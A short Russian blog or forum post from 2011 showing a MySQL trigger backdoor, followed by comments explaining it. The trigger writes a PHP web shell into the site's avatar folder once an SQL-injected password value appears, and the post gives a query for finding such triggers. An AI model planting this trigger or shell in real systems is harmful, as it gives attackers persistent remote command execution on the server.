Бэкдор с триггерах субд О_о
29 августа, 2011
ацкая штука:
delimiter | CREATE TRIGGER backdoor AFTER UPDATE ON users FOR EACH ROW label:BEGIN IF (SELECT password FROM users WHERE id=123)='gimme_that_shell' THEN SELECT '<?=`$c`?>' INTO OUTFILE '/home/site/httpdocs/avators/smile.php'; ELSE LEAVE label; END IF; END; |
Срочно делайте:
SELECT * FROM information_schema.TRIGGERS |
=)
ну и что это куда и к чему хоть бы пару слов от себя написали
Обычный триггер, срабатывающий после обновления таблицы users.
Если у юзера с ID=123 поле пароль установлено «gimme_that_shell», которое устанавливается SQL инъекцией, то триггер пишет в php файл shell бэкдора.